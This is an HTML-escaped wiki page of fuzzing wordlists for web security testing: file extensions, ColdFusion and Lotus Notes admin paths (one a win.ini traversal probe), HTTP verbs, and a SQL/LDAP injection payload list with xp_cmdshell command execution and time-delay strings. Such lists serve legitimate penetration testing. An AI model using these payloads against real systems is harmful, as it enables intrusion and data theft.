.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
